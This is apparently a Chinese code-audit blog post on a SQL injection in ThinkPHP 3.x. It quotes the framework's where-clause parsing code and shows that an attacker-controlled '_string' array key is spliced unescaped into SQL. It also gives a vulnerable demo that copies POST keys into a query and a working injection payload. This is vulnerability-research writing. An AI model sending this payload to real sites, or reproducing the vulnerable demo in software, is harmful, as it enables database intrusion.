ThinkPHP3.x key可控注入漏洞

2020年9月15日08:00:50评论261 views字数 2103阅读7分0秒阅读模式

也不知道别人发过没，如有雷同纯属巧合

parseWhere:

protected function parseWhere($where) {
    $whereStr = '';
    if(is_string($where)) {
        // 直接使用字符串条件
        $whereStr = $where;
    }else{ // 使用数组表达式
        $operate  = isset($where['_logic'])?strtoupper($where['_logic']):'';
        if(in_array($operate,array('AND','OR','XOR'))){
            // 定义逻辑运算规则 例如 OR XOR AND NOT
            $operate    =   ' '.$operate.' ';
            unset($where['_logic']);
        }else{
            // 默认进行 AND 运算
            $operate    =   ' AND ';
        }
        foreach ($where as $key=>$val){
            if(is_numeric($key)){
                $key  = '_complex';
            }
            if(0===strpos($key,'_')) {
                // 解析特殊条件表达式
                $whereStr   .= $this->parseThinkWhere($key,$val);
            }else{
                $multi  = is_array($val) &&  isset($val['_multi']);
                $key    = trim($key);
                if(strpos($key,'|')) { // 支持 name|title|nickname 方式定义查询字段
                    $array =  explode('|',$key);
                    $str   =  array();
                    foreach ($array as $m=>$k){
                        $v =  $multi?$val[$m]:$val;
                        $str[]   = $this->parseWhereItem($this->parseKey($k),$v);
                    }
                    $whereStr .= '( '.implode(' OR ',$str).' )';
                }elseif(strpos($key,'&')){
                    $array =  explode('&',$key);
                    $str   =  array();
                    foreach ($array as $m=>$k){
                        $v =  $multi?$val[$m]:$val;
                        $str[]   = '('.$this->parseWhereItem($this->parseKey($k),$v).')';
                    }
                    $whereStr .= '( '.implode(' AND ',$str).' )';
                }else{
                    $whereStr .= $this->parseWhereItem($this->parseKey($key),$val);
                }
            }
            $whereStr .= $operate;
        }
        $whereStr = substr($whereStr,0,-strlen($operate));
    }
    return empty($whereStr)?'':' WHERE '.$whereStr;
}

仔细看下这段代码：

if(0===strpos($key,'_')) {
    $whereStr   .= $this->parseThinkWhere($key,$val);
}

如果说我的key可控，那么就可以parseThinkWhere这个方法:

protected function parseThinkWhere($key,$val) {
    $whereStr   = '';
    switch($key) {
        case '_string':
            // 字符串模式查询条件
            $whereStr = $val;
            break;
        case '_complex':
            // 复合查询条件
            $whereStr = substr($this->parseWhere($val),6);
            break;
        case '_query':
            // 字符串模式查询条件
            parse_str($val,$where);
            if(isset($where['_logic'])) {
                $op   =  ' '.strtoupper($where['_logic']).' ';
                unset($where['_logic']);
            }else{
                $op   =  ' AND ';
            }
            $array   =  array();
            foreach ($where as $field=>$data)
                $array[] = $this->parseKey($field).' = '.$this->parseValue($data);
            $whereStr   = implode($op,$array);
            break;
    }
    return '( '.$whereStr.' )';
}

当$key等于_string的时候会将value拼接到whereStr中，此时会造成注入漏洞，当然case下面几个同理。

漏洞演示：

这个地方比较麻烦的在于key必须可控，这里就限制了很多，当然key可控的cms也很多，其中比较具有代表性的就算Thinkcmf了。

demo：

$data=array();
foreach($_POST as $key => $value){
    $data[$key]=$value;
}
$valu = $User->where($data)->select();

此时POST数据传入:

_string=Id%3d1) and 1=1 -- -a

截图:

ThinkPHP3.x key可控注入漏洞

免责声明:文章中涉及的程序(方法)可能带有攻击性，仅供安全研究与教学之用，读者将其信息做其他用途，由读者承担全部法律及连带责任，本站不承担任何法律及连带责任；如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截，联系方式见首页)，望知悉。

左青龙
微信扫一扫

右白虎
微信扫一扫

ThinkPHP3.x key可控注入漏洞

parseWhere:

漏洞演示：

截图:

PHP代审之微信公众号小说系统

JAVA代码审计之鉴权学习

.NET代码审计基础

代码审计Tips - PHP反序列化

JavaSec | jackson反序列化通杀链

PHP代审之某号卡推广分销管理系统

【JAVA代码审计】启航电商ERP2.0漏洞挖掘

【JAVA代审】基于Spring boot的医药管理系统审计

真的就是RCE

某次.NET源码的前台审计流程

发表评论

在线咨询

微信